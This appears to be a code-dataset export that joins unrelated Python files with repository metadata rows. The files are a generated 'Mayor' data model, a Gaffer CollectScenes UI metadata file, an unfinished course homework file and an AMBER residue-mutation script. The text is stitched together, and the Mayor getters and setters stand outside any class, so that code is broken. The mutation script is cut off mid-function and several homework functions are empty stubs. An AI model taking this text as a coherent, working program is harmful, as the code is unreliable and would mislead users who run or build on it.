    """Assign the ``active_year`` value of this Mayor (list[str])."""
    self._active_year = active_year

@property
def person_function(self):
    """Return the ``person_function`` value of this Mayor (list[object])."""
    return self._person_function

@person_function.setter
def person_function(self, person_function):
    """Assign the ``person_function`` value of this Mayor (list[object])."""
    self._person_function = person_function

@property
def pro_since(self):
    """Return the ``pro_since`` value of this Mayor (list[str])."""
    return self._pro_since

@pro_since.setter
def pro_since(self, pro_since):
    """Assign the ``pro_since`` value of this Mayor (list[str])."""
    self._pro_since = pro_since

@property
def cause_of_death(self):
    """Return the ``cause_of_death`` value of this Mayor (list[str])."""
    return self._cause_of_death

@cause_of_death.setter
def cause_of_death(self, cause_of_death):
    """Assign the ``cause_of_death`` value of this Mayor (list[str])."""
    self._cause_of_death = cause_of_death

@property
def dubber(self):
    """Return ``dubber`` — the person who dubs another person, e.g. an actor or a fictional character in movies (list[object])."""
    return self._dubber

@dubber.setter
def dubber(self, dubber):
    """Assign ``dubber`` — the person who dubs another person (list[object])."""
    self._dubber = dubber

@property
def non_professional_career(self):
    """Return the ``non_professional_career`` value of this Mayor (list[str])."""
    return self._non_professional_career

@non_professional_career.setter
def non_professional_career(self, non_professional_career):
    """Assign the ``non_professional_career`` value of this Mayor (list[str])."""
    self._non_professional_career = non_professional_career

@property
def military_function(self):
    """Return the ``military_function`` value of this Mayor (list[str])."""
    return self._military_function

@military_function.setter
def military_function(self, military_function):
    """Assign the ``military_function`` value of this Mayor (list[str])."""
    self._military_function = military_function

@property
def patent(self):
    """Return the ``patent`` value of this Mayor (list[object])."""
    return self._patent

@patent.setter
def patent(self, patent):
    """Assign the ``patent`` value of this Mayor (list[object])."""
    self._patent = patent

@property
def creation_christian_bishop(self):
    """Return the ``creation_christian_bishop`` value of this Mayor (list[str])."""
    return self._creation_christian_bishop

@creation_christian_bishop.setter
def creation_christian_bishop(self, creation_christian_bishop):
    """Assign the ``creation_christian_bishop`` value of this Mayor (list[str])."""
    self._creation_christian_bishop = creation_christian_bishop
@property
def piercing(self):
    """Return the ``piercing`` value of this Mayor (list[str])."""
    return self._piercing

@piercing.setter
def piercing(self, piercing):
    """Assign the ``piercing`` value of this Mayor (list[str])."""
    self._piercing = piercing

@property
def student(self):
    """Return the ``student`` value of this Mayor (list[object])."""
    return self._student

@student.setter
def student(self, student):
    """Assign the ``student`` value of this Mayor (list[object])."""
    self._student = student

@property
def bad_guy(self):
    """Return the ``bad_guy`` value of this Mayor (list[str])."""
    return self._bad_guy

@bad_guy.setter
def bad_guy(self, bad_guy):
    """Assign the ``bad_guy`` value of this Mayor (list[str])."""
    self._bad_guy = bad_guy

@property
def influenced(self):
    """Return the ``influenced`` value of this Mayor (list[object])."""
    return self._influenced

@influenced.setter
def influenced(self, influenced):
    """Assign the ``influenced`` value of this Mayor (list[object])."""
    self._influenced = influenced

@property
def start_reign(self):
    """Return the ``start_reign`` value of this Mayor (list[object])."""
    return self._start_reign

@start_reign.setter
def start_reign(self, start_reign):
    """Assign the ``start_reign`` value of this Mayor (list[object])."""
    self._start_reign = start_reign

@property
def university(self):
    """Return ``university`` — university the person goes or went to (list[object])."""
    return self._university

@university.setter
def university(self, university):
    """Assign ``university`` — university the person goes or went to (list[object])."""
    self._university = university

@property
def gym_apparatus(self):
    """Return the ``gym_apparatus`` value of this Mayor (list[object])."""
    return self._gym_apparatus

@gym_apparatus.setter
def gym_apparatus(self, gym_apparatus):
    """Assign the ``gym_apparatus`` value of this Mayor (list[object])."""
    self._gym_apparatus = gym_apparatus

@property
def ideology(self):
    """Return the ``ideology`` value of this Mayor (list[object])."""
    return self._ideology

@ideology.setter
def ideology(self, ideology):
    """Assign the ``ideology`` value of this Mayor (list[object])."""
    self._ideology = ideology

@property
def conviction_date(self):
    """Return the ``conviction_date`` value of this Mayor (list[str])."""
    return self._conviction_date

@conviction_date.setter
def conviction_date(self, conviction_date):
    """Assign the ``conviction_date`` value of this Mayor (list[str])."""
    self._conviction_date = conviction_date

@property
def media(self):
    """Return the ``media`` value of this Mayor (list[object])."""
    return self._media

@media.setter
def media(self, media):
    """Assign the ``media`` value of this Mayor (list[object])."""
    self._media = media
@property
def bnf_id(self):
    """Return ``bnf_id`` — authority identifiers from the general catalogue of the National Library of France (list[str])."""
    return self._bnf_id

@bnf_id.setter
def bnf_id(self, bnf_id):
    """Assign ``bnf_id`` — National Library of France authority identifiers (list[str])."""
    self._bnf_id = bnf_id

@property
def pseudonym(self):
    """Return the ``pseudonym`` value of this Mayor (list[str])."""
    return self._pseudonym

@pseudonym.setter
def pseudonym(self, pseudonym):
    """Assign the ``pseudonym`` value of this Mayor (list[str])."""
    self._pseudonym = pseudonym

@property
def temple_year(self):
    """Return the ``temple_year`` value of this Mayor (list[str])."""
    return self._temple_year

@temple_year.setter
def temple_year(self, temple_year):
    """Assign the ``temple_year`` value of this Mayor (list[str])."""
    self._temple_year = temple_year

@property
def clothing_size(self):
    """Return the ``clothing_size`` value of this Mayor (list[str])."""
    return self._clothing_size

@clothing_size.setter
def clothing_size(self, clothing_size):
    """Assign the ``clothing_size`` value of this Mayor (list[str])."""
    self._clothing_size = clothing_size

@property
def speciality(self):
    """Return the ``speciality`` value of this Mayor (list[str])."""
    return self._speciality

@speciality.setter
def speciality(self, speciality):
    """Assign the ``speciality`` value of this Mayor (list[str])."""
    self._speciality = speciality

@property
def award(self):
    """Return the ``award`` value of this Mayor (list[object])."""
    return self._award

@award.setter
def award(self, award):
    """Assign the ``award`` value of this Mayor (list[object])."""
    self._award = award

@property
def kind_of_criminal_action(self):
    """Return the ``kind_of_criminal_action`` value of this Mayor (list[str])."""
    return self._kind_of_criminal_action

@kind_of_criminal_action.setter
def kind_of_criminal_action(self, kind_of_criminal_action):
    """Assign the ``kind_of_criminal_action`` value of this Mayor (list[str])."""
    self._kind_of_criminal_action = kind_of_criminal_action

@property
def isni_id(self):
    """Return ``isni_id`` (list[str]).

    ISNI uniquely identifies the public identities of contributors to
    media content such as books, TV programmes, and newspaper articles.
    """
    return self._isni_id

@isni_id.setter
def isni_id(self, isni_id):
    """Assign ``isni_id`` — ISNI identifiers for this Mayor (list[str])."""
    self._isni_id = isni_id

@property
def significant_project(self):
    """Return ``significant_project`` — a significant artifact constructed by the person (list[object])."""
    return self._significant_project

@significant_project.setter
def significant_project(self, significant_project):
    """Assign ``significant_project`` — a significant artifact constructed by the person (list[object])."""
    self._significant_project = significant_project
@property
def leadership(self):
    """list[str]: Leadership roles recorded for this Mayor."""
    return self._leadership

@leadership.setter
def leadership(self, leadership):
    """Store the leadership roles for this Mayor."""
    self._leadership = leadership

@property
def death_date(self):
    """list[str]: Death dates recorded for this Mayor."""
    return self._death_date

@death_date.setter
def death_date(self, death_date):
    """Store the death dates for this Mayor."""
    self._death_date = death_date

@property
def special_trial(self):
    """list[int]: Special-trial values recorded for this Mayor."""
    return self._special_trial

@special_trial.setter
def special_trial(self, special_trial):
    """Store the special-trial values for this Mayor."""
    self._special_trial = special_trial

@property
def resting_date(self):
    """list[str]: Resting dates recorded for this Mayor."""
    return self._resting_date

@resting_date.setter
def resting_date(self, resting_date):
    """Store the resting dates for this Mayor."""
    self._resting_date = resting_date

@property
def victim(self):
    """list[str]: Victims associated with this Mayor."""
    return self._victim

@victim.setter
def victim(self, victim):
    """Store the victims for this Mayor."""
    self._victim = victim

@property
def has_natural_bust(self):
    """list[str]: Natural-bust values recorded for this Mayor."""
    return self._has_natural_bust

@has_natural_bust.setter
def has_natural_bust(self, has_natural_bust):
    """Store the natural-bust values for this Mayor."""
    self._has_natural_bust = has_natural_bust
@property
def masters_wins(self):
    """list[object]: Masters wins recorded for this Mayor."""
    return self._masters_wins

@masters_wins.setter
def masters_wins(self, masters_wins):
    """Store the masters wins for this Mayor."""
    self._masters_wins = masters_wins

@property
def individualised_pnd(self):
    """list[int]: PND (Personennamendatei) identifiers — published by the
    German National Library; each person's record carries name, birth and
    occupation tied to a unique PND number."""
    return self._individualised_pnd

@individualised_pnd.setter
def individualised_pnd(self, individualised_pnd):
    """Store the PND identifiers for this Mayor."""
    self._individualised_pnd = individualised_pnd

@property
def continental_tournament_gold(self):
    """list[int]: Continental-tournament gold counts for this Mayor."""
    return self._continental_tournament_gold

@continental_tournament_gold.setter
def continental_tournament_gold(self, continental_tournament_gold):
    """Store the continental-tournament gold counts for this Mayor."""
    self._continental_tournament_gold = continental_tournament_gold

@property
def orientation(self):
    """list[str]: Orientation values recorded for this Mayor."""
    return self._orientation

@orientation.setter
def orientation(self, orientation):
    """Store the orientation values for this Mayor."""
    self._orientation = orientation

@property
def grave(self):
    """list[str]: Grave locations recorded for this Mayor."""
    return self._grave

@grave.setter
def grave(self, grave):
    """Store the grave locations for this Mayor."""
    self._grave = grave

@property
def resting_place(self):
    """list[object]: Resting places recorded for this Mayor."""
    return self._resting_place

@resting_place.setter
def resting_place(self, resting_place):
    """Store the resting places for this Mayor."""
    self._resting_place = resting_place
@property
def abbeychurch_blessing_charge(self):
    """list[str]: Abbey-church blessing charges recorded for this Mayor."""
    return self._abbeychurch_blessing_charge

@abbeychurch_blessing_charge.setter
def abbeychurch_blessing_charge(self, abbeychurch_blessing_charge):
    """Store the abbey-church blessing charges for this Mayor."""
    self._abbeychurch_blessing_charge = abbeychurch_blessing_charge

@property
def handisport(self):
    """list[str]: Handisport values recorded for this Mayor."""
    return self._handisport

@handisport.setter
def handisport(self, handisport):
    """Store the handisport values for this Mayor."""
    self._handisport = handisport

@property
def external_ornament(self):
    """list[str]: External ornaments recorded for this Mayor."""
    return self._external_ornament

@external_ornament.setter
def external_ornament(self, external_ornament):
    """Store the external ornaments for this Mayor."""
    self._external_ornament = external_ornament

@property
def third(self):
    """list[int]: Third-place counts recorded for this Mayor."""
    return self._third

@third.setter
def third(self, third):
    """Store the third-place counts for this Mayor."""
    self._third = third

@property
def film_number(self):
    """list[int]: Film numbers recorded for this Mayor."""
    return self._film_number

@film_number.setter
def film_number(self, film_number):
    """Store the film numbers for this Mayor."""
    self._film_number = film_number

@property
def temple(self):
    """list[str]: Temples recorded for this Mayor."""
    return self._temple

@temple.setter
def temple(self, temple):
    """Store the temples for this Mayor."""
    self._temple = temple
@property
def end_reign(self):
    """list[object]: End-of-reign values recorded for this Mayor."""
    return self._end_reign

@end_reign.setter
def end_reign(self, end_reign):
    """Store the end-of-reign values for this Mayor."""
    self._end_reign = end_reign

@property
def national_tournament_gold(self):
    """list[int]: National-tournament gold counts for this Mayor."""
    return self._national_tournament_gold

@national_tournament_gold.setter
def national_tournament_gold(self, national_tournament_gold):
    """Store the national-tournament gold counts for this Mayor."""
    self._national_tournament_gold = national_tournament_gold

@property
def death_cause(self):
    """list[object]: Causes of death recorded for this Mayor."""
    return self._death_cause

@death_cause.setter
def death_cause(self, death_cause):
    """Store the causes of death for this Mayor."""
    self._death_cause = death_cause
def to_dict(self):
    """Return the model's properties as a plain dict.

    Iterates the attributes declared in ``self.openapi_types`` and
    serialises nested models recursively: any value (or list element,
    or dict value) exposing ``to_dict`` is converted via that method.

    Fix: replaced the Python-2 ``six.iteritems`` shim with native dict
    iteration; behavior is unchanged.
    """
    result = {}
    for attr in self.openapi_types:
        value = getattr(self, attr)
        if isinstance(value, list):
            result[attr] = [
                item.to_dict() if hasattr(item, "to_dict") else item
                for item in value
            ]
        elif hasattr(value, "to_dict"):
            result[attr] = value.to_dict()
        elif isinstance(value, dict):
            result[attr] = {
                key: val.to_dict() if hasattr(val, "to_dict") else val
                for key, val in value.items()
            }
        else:
            result[attr] = value
    return result
def to_str(self):
    """Return a pretty-printed string form of this model."""
    as_dict = self.to_dict()
    return pprint.pformat(as_dict)
def __repr__(self):
    """Delegate to ``to_str`` so `print`/`pprint` show the dict form."""
    return self.to_str()
def __eq__(self, other):
    """Two Mayor instances are equal when their dict forms match."""
    return isinstance(other, Mayor) and self.to_dict() == other.to_dict()
def __ne__(self, other):
    """Inverse of ``__eq__``: unequal unless *other* is an equivalent Mayor."""
    if isinstance(other, Mayor):
        return self.to_dict() != other.to_dict()
    return True
| [
"[email protected]"
] | |
210ea9a60a611db409d76c3c0405210c78d2cfcc | 2b7cd8141d6c17572c05d4d70e3e616e02449e72 | /python/GafferSceneUI/CollectScenesUI.py | 341298801206215eb7677d5fcea14b99ce048bf9 | [
"BSD-3-Clause"
] | permissive | gray10b/gaffer | 45aefd4ebbf515d5b491777a3bfd027d90715114 | 828b3b59f1154b0a14020cbf9a292c9048c09968 | refs/heads/master | 2021-01-02T09:11:13.137347 | 2017-08-04T05:07:31 | 2017-08-04T05:07:31 | 99,158,553 | 0 | 0 | null | 2017-08-02T20:34:13 | 2017-08-02T20:34:13 | null | UTF-8 | Python | false | false | 3,233 | py | ##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferScene
# UI metadata registration: attaches the node description and per-plug
# help strings for GafferScene.CollectScenes (runs once at import time).
Gaffer.Metadata.registerNode(
GafferScene.CollectScenes,
"description",
"""
Builds a scene by bundling multiple input scenes together, each
under their own root location. Instead of using an array of inputs
like the Group node, a single input is used instead, and a context
variable is provided so that a different hierarchy can be generated
under each root location. This is especially powerful for building
dynamic scenes where the number of inputs is not known prior to
building the node graph.
Since merging globals from multiple scenes often doesn't make sense,
the output globals are taken directly from the scene corresponding to
`rootNames[0]`.
""",
plugs = {
"rootNames" : [
"description",
"""
The names of the locations to create at the root of
the output scene. The input scene is copied underneath
each of these root locations.
Often the rootNames will be driven by an expression that generates
a dynamic number of root locations, perhaps by querying an asset
management system or listing cache files on disk.
""",
],
"rootNameVariable" : [
"description",
"""
The name of a context variable that is set to the current
root name when evaluating the input scene. This can be used
in upstream expressions and string substitutions to generate
a different hierarchy under each root location.
""",
],
}
)
| [
"[email protected]"
] | |
f2dbfe14a65b0edc19d892ddcc7a57467691b220 | f87f51ec4d9353bc3836e22ac4a944951f9c45c0 | /.history/HW01_20210624144937.py | b9d45c1f373833420f3987ed361ba22bbc6b3abd | [] | no_license | sanjayMamidipaka/cs1301 | deaffee3847519eb85030d1bd82ae11e734bc1b7 | 9ddb66596497382d807673eba96853a17884d67b | refs/heads/main | 2023-06-25T04:52:28.153535 | 2021-07-26T16:42:44 | 2021-07-26T16:42:44 | 389,703,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,177 | py | """
Georgia Institute of Technology - CS1301
HW01 - Functions and Expressions
Collaboration Statement:
"""
#########################################
"""
Function Name: bake()
Parameters: cakes (int), cupcakes (int), cookies (int)
Returns: None
"""
def bake(cakes, cupcakes, cookies):
    """Print the total baking time (cakes 100 min, cupcakes 70, cookies 45)."""
    minutes_needed = cakes * 100 + cupcakes * 70 + cookies * 45
    hours, minutes = divmod(minutes_needed, 60)
    print('It will take {} hours and {} minutes to make {} cakes, {} cupcakes, and {} cookies.'.format(hours, minutes, cakes, cupcakes, cookies))
#########################################
"""
Function Name: cakeVolume()
Parameters: radius (int), height (int)
Returns: None
"""
def cakeVolume(radius, height):
    """Print the cylinder volume of a cake (pi approximated as 3.14, 2 dp)."""
    rounded_volume = round(3.14 * radius ** 2 * height, 2)
    print('The volume of the cake is {}.'.format(rounded_volume))
#########################################
"""
Function Name: celebrate()
Parameters: pizzas (int), pastas (int), burgers (int), tipPercent (int)
Returns: None
"""
def celebrate(pizzas, pastas, burgers, tipPercent):
    """Print the total cost of the meal ($14 pizza, $10 pasta, $7 burger) plus tip.

    Fix: the original computed the tip and then executed a bare ``print()``,
    so the result was never reported; the total is now printed.
    (Exact wording is a best guess — the assignment's expected output
    format is not visible here.)
    """
    food_cost = pizzas * 14 + pastas * 10 + burgers * 7
    tip = food_cost * (tipPercent / 100)
    total = food_cost + tip
    print('The total cost of the celebration is ${:.2f}.'.format(total))
"""
Function Name: bookstore()
Parameters: daysBorrowed (int)
Returns: None
"""
def bookstore(daysBorrowed):
    """Report the cost of borrowing a book for *daysBorrowed* days.

    NOTE(review): stub — the homework body has not been written yet.
    """
    pass
#########################################
"""
Function Name: monthlyAllowance()
Parameters: allowance (int), savingsPercentage (int)
Returns: None
"""
def monthlyAllowance(allowance, savingsPercentage):
pass
# Demo invocations — executed whenever this module is run or imported.
bake(1, 3, 12)
cakeVolume(5, 8)
"[email protected]"
] | |
28ce163f3b9cf5eb8781bca648c833347a56180a | 47b4d76e9c87e6c45bab38e348ae12a60a60f94c | /Mutation_Modules/ILE_VAL.py | 1febf610cbd99aa48137a62bd7106f55e86ea931 | [] | no_license | PietroAronica/Parasol.py | 9bc17fd8e177e432bbc5ce4e7ee2d721341b2707 | 238abcdc2caee7bbfea6cfcdda1ca705766db204 | refs/heads/master | 2021-01-10T23:57:40.225140 | 2020-10-14T02:21:15 | 2020-10-14T02:21:15 | 70,791,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,858 | py | # ILE to VAL Mutation
import Frcmod_creator
import PDBHandler
import Leapy
from parmed.tools.actions import *
from parmed.amber.readparm import *
def parmed_command(vxi='VXI', lipid='No'):
    # ILE -> VAL alchemical mutation: rewrite the charges of hybrid residue
    # *vxi* in each of the eleven lambda-window topologies
    # (Solv_0_100.prmtop ... Solv_100_0.prmtop), interpolating linearly from
    # the ILE charge set toward the VAL charge set.
    # NOTE(review): *lipid* is accepted for interface parity with the other
    # mutation modules but is not used here — confirm against callers.
    bc = {}  # baseline (ILE) charges keyed by atom name
    with open('Param_files/AminoAcid/ILE.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            key, value = line.split()
            bc[key] = float(value)
    b.close()  # redundant: the with-block already closed the file
    fc = {}  # final (VAL) charges keyed by atom name
    with open('Param_files/AminoAcid/VAL.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            key, value = line.split()
            fc[key] = float(value)
    b.close()  # redundant: the with-block already closed the file
    for i in range(11):
        a = i*10  # window label, e.g. Solv_30_70.prmtop at i == 3
        parm = AmberParm('Solv_{}_{}.prmtop'.format(a, 100-a))
        # Zero the LJ interaction between the appearing HG11 and the
        # vanishing HD11 so the dual-topology atoms never clash.
        changeLJPair(parm, ':{}@HG11'.format(vxi), ':{}@HD11'.format(vxi), '0', '0').execute()
        # Backbone and shared side-chain atoms: interpolate ILE -> VAL.
        change(parm, 'charge', ':{}@N'.format(vxi), bc['N']+((fc['N']-bc['N'])/10)*i).execute()
        change(parm, 'charge', ':{}@H'.format(vxi), bc['H']+((fc['H']-bc['H'])/10)*i).execute()
        change(parm, 'charge', ':{}@CA'.format(vxi), bc['CA']+((fc['CA']-bc['CA'])/10)*i).execute()
        change(parm, 'charge', ':{}@HA'.format(vxi), bc['HA']+((fc['HA']-bc['HA'])/10)*i).execute()
        change(parm, 'charge', ':{}@CB'.format(vxi), bc['CB']+((fc['CB']-bc['CB'])/10)*i).execute()
        change(parm, 'charge', ':{}@HB'.format(vxi), bc['HB']+((fc['HB']-bc['HB'])/10)*i).execute()
        change(parm, 'charge', ':{}@CG2'.format(vxi), bc['CG2']+((fc['CG2']-bc['CG2'])/10)*i).execute()
        change(parm, 'charge', ':{}@HG21'.format(vxi), bc['HG21']+((fc['HG21']-bc['HG21'])/10)*i).execute()
        change(parm, 'charge', ':{}@HG22'.format(vxi), bc['HG22']+((fc['HG22']-bc['HG22'])/10)*i).execute()
        change(parm, 'charge', ':{}@HG23'.format(vxi), bc['HG23']+((fc['HG23']-bc['HG23'])/10)*i).execute()
        change(parm, 'charge', ':{}@CG1'.format(vxi), bc['CG1']+((fc['CG1']-bc['CG1'])/10)*i).execute()
        # HG11 exists only in VAL: grow its charge from zero.
        change(parm, 'charge', ':{}@HG11'.format(vxi), (fc['HG11']/10)*i).execute()
        change(parm, 'charge', ':{}@HG12'.format(vxi), bc['HG12']+((fc['HG12']-bc['HG12'])/10)*i).execute()
        change(parm, 'charge', ':{}@HG13'.format(vxi), bc['HG13']+((fc['HG13']-bc['HG13'])/10)*i).execute()
        # The ILE delta methyl (CD1/HD1x) vanishes: shrink its charges to zero.
        change(parm, 'charge', ':{}@CD1'.format(vxi), bc['CD1']-(bc['CD1']/10)*i).execute()
        change(parm, 'charge', ':{}@HD11'.format(vxi), bc['HD11']-(bc['HD11']/10)*i).execute()
        change(parm, 'charge', ':{}@HD12'.format(vxi), bc['HD12']-(bc['HD12']/10)*i).execute()
        change(parm, 'charge', ':{}@HD13'.format(vxi), bc['HD13']-(bc['HD13']/10)*i).execute()
        change(parm, 'charge', ':{}@C'.format(vxi), bc['C']+((fc['C']-bc['C'])/10)*i).execute()
        change(parm, 'charge', ':{}@O'.format(vxi), bc['O']+((fc['O']-bc['O'])/10)*i).execute()
        # Write the modified topology back over the original file.
        setOverwrite(parm).execute()
        parmout(parm, 'Solv_{}_{}.prmtop'.format(a, 100-a)).execute()
def makevxi(struct, out, aa, vxi='VXI'):
    # Write a PDB for the hybrid residue: rename residue *aa* to *vxi* and
    # inject a dummy HG11 atom right after CG1, positioned on top of CD1
    # (presumably `superimposed1` seeds HG11 from CD1's coordinates — it is
    # defined in PDBHandler; confirm there).
    struct.residue_dict[aa].set_resname(vxi)
    CD1 = struct.residue_dict[aa].atom_dict['CD1']
    pdb = open(out, 'w')
    try:
        pdb.write(struct.other_dict['Cryst1'].formatted())
    except KeyError:
        pass  # no CRYST1 record in the source structure
    for res in struct.residue_list:
        for atom in res.atom_list:
            if atom.get_name() == 'CG1' and res.get_resname() == vxi:
                # Emit CG1 itself, then the new HG11 placed on CD1.
                pdb.write(atom.formatted())
                pdb.write(atom.superimposed1('HG11', CD1))
            else:
                pdb.write(atom.formatted())
            try:
                # Preserve any TER record that followed this atom.
                pdb.write(struct.other_dict[atom.get_number()].ter())
            except:
                pass
    for oth in struct.other_dict:
        try:
            if oth.startswith('Conect'):
                pdb.write(struct.other_dict[oth].formatted())
        except:
            pass  # non-string keys (e.g. atom numbers) have no startswith
    pdb.write('END\n')
def variablemake(sym='^'):
    """Return the 15 placeholder atom-type names used by the hybrid residue.

    Each name is *sym* followed by one character of '1234567890abcde',
    in that order (so the defaults are '^1', '^2', ..., '^e').
    """
    return tuple(sym + suffix for suffix in '1234567890abcde')
def lib_make(ff, outputfile, vxi='VXI', var=variablemake()):
    """Write a LEaP input file defining the ILE->VAL hybrid residue and run it.

    Loads the template PDB, assigns element/name/type to each of the 20
    atoms, declares the bond graph, sets head/tail connectivity and saves
    the residue library as ``<vxi>.lib`` via Leapy.

    Fix: the original spelled out ~80 near-identical ``ctrl.write`` lines;
    they are collapsed into data tables + loops that emit byte-identical
    LEaP commands in the same order.
    """
    metcar = var[0]   # vanishing CD1 methyl carbon type
    methyd = var[1]   # vanishing HD1x hydrogen type
    hydhyd = var[2]   # appearing HG11 hydrogen type
    # Per-atom tables, indexed 1..20 in PDB order.
    elements = ['N', 'H', 'C', 'H', 'C', 'H', 'C', 'H', 'H', 'H',
                'C', 'H', 'H', 'H', 'C', 'H', 'H', 'H', 'C', 'O']
    names = ['N', 'H', 'CA', 'HA', 'CB', 'HB', 'CG2', 'HG21', 'HG22', 'HG23',
             'CG1', 'HG11', 'HG12', 'HG13', 'CD1', 'HD11', 'HD12', 'HD13', 'C', 'O']
    types = ['N', 'H', 'CT', 'H1', 'CT', 'HC', 'CT', 'HC', 'HC', 'HC',
             'CT', hydhyd, 'HC', 'HC', metcar, methyd, methyd, methyd, 'C', 'O']
    bonds = [(1, 2), (1, 3), (3, 4), (3, 5), (3, 19), (5, 6), (5, 7), (5, 11),
             (7, 8), (7, 9), (7, 10), (11, 12), (11, 13), (11, 14), (11, 15),
             (15, 16), (15, 17), (15, 18), (19, 20)]
    ctrl = open('lyp.in', 'w')
    ctrl.write("source %s\n" % ff)
    ctrl.write("%s=loadpdb Param_files/LibPDB/ILE-VAL.pdb\n" % vxi)
    for idx, elem in enumerate(elements, start=1):
        ctrl.write('set %s.1.%d element "%s"\n' % (vxi, idx, elem))
    for idx, name in enumerate(names, start=1):
        ctrl.write('set %s.1.%d name "%s"\n' % (vxi, idx, name))
    for idx, typ in enumerate(types, start=1):
        ctrl.write('set %s.1.%d type "%s"\n' % (vxi, idx, typ))
    for i, j in bonds:
        ctrl.write('bond %s.1.%d %s.1.%d\n' % (vxi, i, vxi, j))
    # Backbone connectivity and library export.
    ctrl.write('set %s.1 connect0 %s.1.N\n' % (vxi, vxi))
    ctrl.write('set %s.1 connect1 %s.1.C\n' % (vxi, vxi))
    ctrl.write('set %s name "%s"\n' % (vxi, vxi))
    ctrl.write('set %s.1 name "%s"\n' % (vxi, vxi))
    ctrl.write('set %s head %s.1.N\n' % (vxi, vxi))
    ctrl.write('set %s tail %s.1.C\n' % (vxi, vxi))
    ctrl.write('saveoff %s %s.lib\n' % (vxi, vxi))
    ctrl.write("quit\n")
    ctrl.close()
    Leapy.run('lyp.in', outputfile)
def all_make():
    """Create one frcmod file per 10% lambda window (0_100 ... 100_0)."""
    for a in range(0, 110, 10):
        Frcmod_creator.make('{}_{}.frcmod'.format(a, 100 - a))
def cal(x, y, i):
    """Interpolate from *x* toward *y* in tenths: i=0 gives x, i=10 gives y."""
    step = (y - x) / 10
    return x + step * i
def lac(x, y, i):
    """Interpolate from *y* toward *x* in tenths: i=0 gives y, i=10 gives x."""
    step = (x - y) / 10
    return y + step * i
def stock_add_to_all(var=variablemake()):
    # Register the three transition atom types — the vanishing CD1 methyl
    # carbon (metcar), its hydrogens (methyd) and the appearing HG11
    # hydrogen (hydhyd) — then write interpolated mass/bond/angle/dihedral/
    # non-bonded parameters into every lambda-window frcmod file.
    metcar = var[0]
    methyd = var[1]
    hydhyd = var[2]
    Frcmod_creator.make_hyb()
    Frcmod_creator.TYPE_insert(metcar, 'C', 'sp3')
    Frcmod_creator.TYPE_insert(methyd, 'H', 'sp3')
    Frcmod_creator.TYPE_insert(hydhyd, 'H', 'sp3')
    # p maps a stock-parameter name to its list of reference values.
    p = {}
    with open('Param_files/Stock/Stock.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            p[line.split()[0]] = []
            for point in line.split()[1:]:
                p[line.split()[0]].append(float(point))
    b.close()  # redundant: the with-block already closed the file
    for i in range(11):
        a = i*10  # window label: <a>_<100-a>.frcmod
        # Masses/polarizabilities interpolate between real and dummy types.
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), metcar, cal(p['CT'][0], p['0_C'][0], i), cal(p['CT'][1], p['0_C'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), methyd, cal(p['HC'][0], p['0_H'][0], i), cal(p['HC'][1], p['0_H'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd, cal(p['0_H'][0], p['HC'][0], i), cal(p['0_H'][1], p['HC'][1], i))
        # Bonds involving the transition types.
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', metcar), cal(p['CT_CT'][0], p['CT_mH'][0], i), cal(p['CT_CT'][1], p['CT_mH'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', hydhyd), cal(p['HC_sC'][0], p['CT_HC'][0], i), cal(p['HC_sC'][1], p['CT_HC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(metcar, methyd), cal(p['CT_HC'][0], p['HC_mH'][0], i), cal(p['CT_HC'][1], p['HC_mH'][1], i))
        # Angles around the vanishing methyl and the appearing hydrogen.
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', metcar, methyd), cal(p['C_C_H'][0], p['Dritt'][0], i), cal(p['C_C_H'][1], p['Dritt'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(methyd, metcar, methyd), cal(p['H_C_H'][0], p['Close'][0], i), cal(p['H_C_H'][1], p['Close'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', metcar), cal(p['C_C_C'][0], p['C_C_C'][0], i), cal(p['C_C_C'][1], p['C_C_C'][1], i))
